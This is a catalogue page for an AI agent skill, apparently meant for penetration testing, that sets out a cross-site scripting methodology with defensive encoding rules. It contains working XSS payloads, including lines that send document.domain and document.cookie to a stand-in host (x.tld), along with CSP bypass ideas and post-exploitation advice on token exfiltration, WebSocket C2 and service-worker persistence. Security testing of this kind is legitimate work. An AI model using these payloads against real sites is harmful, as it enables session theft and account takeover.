mcpbeat Sign in

Strix•XSS 测试 Agent Skill

Strix XSS 测试手册,覆盖反射型、存储型、DOM 型向量与 CSP 绕过;触发名:strix-xss

2k tokens
context cost
the whole folder, loaded on every use
1
files
instructions only
0
copies elsewhere
how many repositories repackaged it
715
stars on the repo
on the repository, not the skill itself

Install

one command, takes just this skill from the repository
npx skills add https://github.com/asdfgh1445/ctf-super-hub --skill Strix•XSS 测试

The instruction itself

28 sections, as written by the author

XSS

Cross-site scripting persists because context, parser, and framework edges are complex. Treat every user-influenced string as untrusted until it is strictly encoded for the exact sink and guarded by runtime policy (CSP/Trusted Types).

Attack Surface

Types

  • Reflected, stored, and DOM-based XSS across web/mobile/desktop shells

Contexts

  • HTML, attribute, URL, JS, CSS, SVG/MathML, Markdown, PDF

Frameworks

  • React/Vue/Angular/Svelte sinks, template engines, SSR/ISR

Defenses to Bypass

  • CSP/Trusted Types, DOMPurify, framework auto-escaping

Injection Points

Server Render

  • Templates (Jinja/EJS/Handlebars), SSR frameworks, email/PDF renderers

Client Render

  • innerHTML/outerHTML/insertAdjacentHTML, template literals
  • dangerouslySetInnerHTML, v-html, $sce.trustAsHtml, Svelte {@html}

URL/DOM

  • location.hash/search, document.referrer, base href, data-* attributes

Events/Handlers

  • onerror/onload/onfocus/onclick and javascript: URL handlers

Cross-Context

  • postMessage payloads, WebSocket messages, local/sessionStorage, IndexedDB

File/Metadata

  • Image/SVG/XML names and EXIF, office documents processed server/client

Context Encoding Rules

  • HTML text: encode < > & " '
  • Attribute value: encode " ' < > & and ensure attribute quoted; avoid unquoted attributes
  • URL/JS URL: encode and validate scheme (allowlist https/mailto/tel); disallow javascript/data
  • JS string: escape quotes, backslashes, newlines; prefer JSON.stringify
  • CSS: avoid injecting into style; sanitize property names/values; beware url() and expression()
  • SVG/MathML: treat as active content; many tags execute via onload or animation events

Key Vulnerabilities

DOM XSS

Sources

  • location.* (hash/search), document.referrer, postMessage, storage, service worker messages

Sinks

  • innerHTML/outerHTML/insertAdjacentHTML, document.write
  • setAttribute, setTimeout/setInterval with strings
  • eval/Function, new Worker with blob URLs

Vulnerable Pattern

const q = new URLSearchParams(location.search).get('q');
results.innerHTML = `<li>${q}</li>`;

Exploit: ?q=<img src=x onerror=fetch('//x.tld/'+document.domain)>

Mutation XSS

Leverage parser repairs to morph safe-looking markup into executable code (e.g., noscript, malformed tags):

<noscript><p title="</noscript><img src=x onerror=alert(1)>
<form><button formaction=javascript:alert(1)>

Template Injection

Server or client templates evaluating expressions (AngularJS legacy, Handlebars helpers, lodash templates):

{{constructor.constructor('fetch(`//x.tld?c=`+document.cookie)')()}}

CSP Bypass

  • Weak policies: missing nonces/hashes, wildcards, data: blob: allowed, inline events allowed
  • Script gadgets: JSONP endpoints, libraries exposing function constructors
  • Import maps or modulepreload lax policies
  • Base tag injection to retarget relative script URLs
  • Dynamic module import with allowed origins

Trusted Types Bypass

  • Custom policies returning unsanitized strings; abuse policy whitelists
  • Sinks not covered by Trusted Types (CSS, URL handlers) and pivot via gadgets

Polyglot Payloads

Keep a compact set tuned per context:

  • HTML node: <svg onload=alert(1)>
  • Attr quoted: " autofocus onfocus=alert(1) x="
  • Attr unquoted: onmouseover=alert(1)
  • JS string: "-alert(1)-"
  • URL: javascript:alert(1)

Framework-Specific

React

  • Primary sink: dangerouslySetInnerHTML
  • Secondary: setting event handlers or URLs from untrusted input
  • Bypass patterns: unsanitized HTML through libraries; custom renderers using innerHTML

Vue

  • Sinks: v-html and dynamic attribute bindings
  • SSR hydration mismatches can re-interpret content

Angular

  • Legacy expression injection (pre-1.6)
  • $sce trust APIs misused to whitelist attacker content

Svelte

  • Sinks: {@html} and dynamic attributes

Markdown/Richtext

  • Renderers often allow HTML passthrough; plugins may re-enable raw HTML
  • Sanitize post-render; forbid inline HTML or restrict to safe whitelist

Special Contexts

Email

  • Most clients strip scripts but allow CSS/remote content
  • Use CSS/URL tricks only if relevant; avoid assuming JS execution

PDF and Docs

  • PDF engines may execute JS in annotations or links
  • Test javascript: in links and submit actions

File Uploads

  • SVG/HTML uploads served with text/html or image/svg+xml can execute inline
  • Verify content-type and Content-Disposition: attachment
  • Mixed MIME and sniffing bypasses; ensure X-Content-Type-Options: nosniff

Post-Exploitation

  • Session/token exfiltration: prefer fetch/XHR over image beacons for reliability
  • Real-time control: WebSocket C2 with strict command set
  • Persistence: service worker registration; localStorage/script gadget re-injection
  • Impact: role hijack, CSRF chaining, internal port scan via fetch, credential phishing overlays

Testing Methodology

  • Identify sources - URL/query/hash/referrer, postMessage, storage, WebSocket, server JSON
  • Trace to sinks - Map data flow from source to sink
  • Classify context - HTML node, attribute, URL, script block, event handler, JS eval-like, CSS, SVG
  • Assess defenses - Output encoding, sanitizer, CSP, Trusted Types, DOMPurify config
  • Craft payloads - Minimal payloads per context with encoding/whitespace/casing variants
  • Multi-channel - Test across REST, GraphQL, WebSocket, SSE, service workers

Validation

  • Provide minimal payload and context (sink type) with before/after DOM or network evidence
  • Demonstrate cross-browser execution where relevant or explain parser-specific behavior
  • Show bypass of stated defenses (sanitizer settings, CSP/Trusted Types) with proof
  • Quantify impact beyond alert: data accessed, action performed, persistence achieved

False Positives

  • Reflected content safely encoded in the exact context
  • CSP with nonces/hashes and no inline/event handlers
  • Trusted Types enforced on sinks; DOMPurify in strict mode with URI allowlists
  • Scriptable contexts disabled (no HTML pass-through, safe URL schemes enforced)

Impact

  • Session hijacking and credential theft
  • Account takeover via token exfiltration
  • CSRF chaining for state-changing actions
  • Malware distribution and phishing
  • Persistent compromise via service workers

Pro Tips

  • Start with context classification, not payload brute force
  • Use DOM instrumentation to log sink usage; it reveals unexpected flows
  • Keep a small, curated payload set per context and iterate with encodings
  • Validate defenses by configuration inspection and negative tests
  • Prefer impact-driven PoCs (exfiltration, CSRF chain) over alert boxes
  • Treat SVG/MathML as first-class active content; test separately
  • Re-run tests under different transports and render paths (SSR vs CSR vs hydration)
  • Test CSP/Trusted Types as features: attempt to violate policy and record the violation reports

Summary

Context + sink decide execution. Encode for the exact context, verify at runtime with CSP/Trusted Types, and validate every alternative render path. Small payloads with strong evidence beat payload catalogs.

Other skills for the same job

different authors, same section of the catalogue
Webapp Testing
by anthropics
vendor ×12

Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.

6k tokens scripts
Finishing A Development Branch
by ZhanlinCui
×7

Use when implementation is complete, all tests pass, and you need to decide how to integrate the work - guides completion of development work by presenting structured options for merge, PR, or cleanup

1k tokens
Test Driven Development
by w95
×7

Use when implementing any feature or bugfix, before writing implementation code

2k tokens
Systematic Debugging
by ratacat
×7

Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes

10k tokens scripts
Verification Before Completion
by ZhanlinCui
×6

Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always

1k tokens
Backtest Expert
by BaggaT236
×3

Expert guidance for systematic backtesting of trading strategies. Use when developing, testing, stress-testing, or validating quantitative trading strategies. Covers "beating ideas to death" methodology, parameter robustness testing, slippage modeling, bias prevention, and interpreting backtest results. Applicable when user asks about backtesting, strategy validation, robustness testing, avoiding overfitting, or systematic trading development.

15k tokens scripts
Adaptyv
by christophacham
×3

Cloud laboratory platform for automated protein testing and validation. Use when designing proteins and needing experimental validation including binding assays, expression testing, thermostability measurements, enzyme activity assays, or protein sequence optimization. Also use for submitting experiments via API, tracking experiment status, downloading results, optimizing protein sequences for better expression using computational tools (NetSolP, SoluProt, SolubleMPNN, ESM), or managing protein design workflows with wet-lab validation.

16k tokens
Aeon
by christophacham
×3

This skill should be used for time series machine learning tasks including classification, regression, clustering, forecasting, anomaly detection, segmentation, and similarity search. Use when working with temporal data, sequential patterns, or time-indexed observations requiring specialized algorithms beyond standard ML approaches. Particularly suited for univariate and multivariate time series analysis with scikit-learn compatible APIs.

19k tokens

How to use it

Copy the folder

Take asdfgh1445/strix•xss 测试 from the repository into ~/.claude/skills for personal use, or into .claude/skills inside a project.

Check the name does not clash

The agent identifies a skill by the name field in its header. Two skills with the same name cannot sit side by side — one of them will be ignored.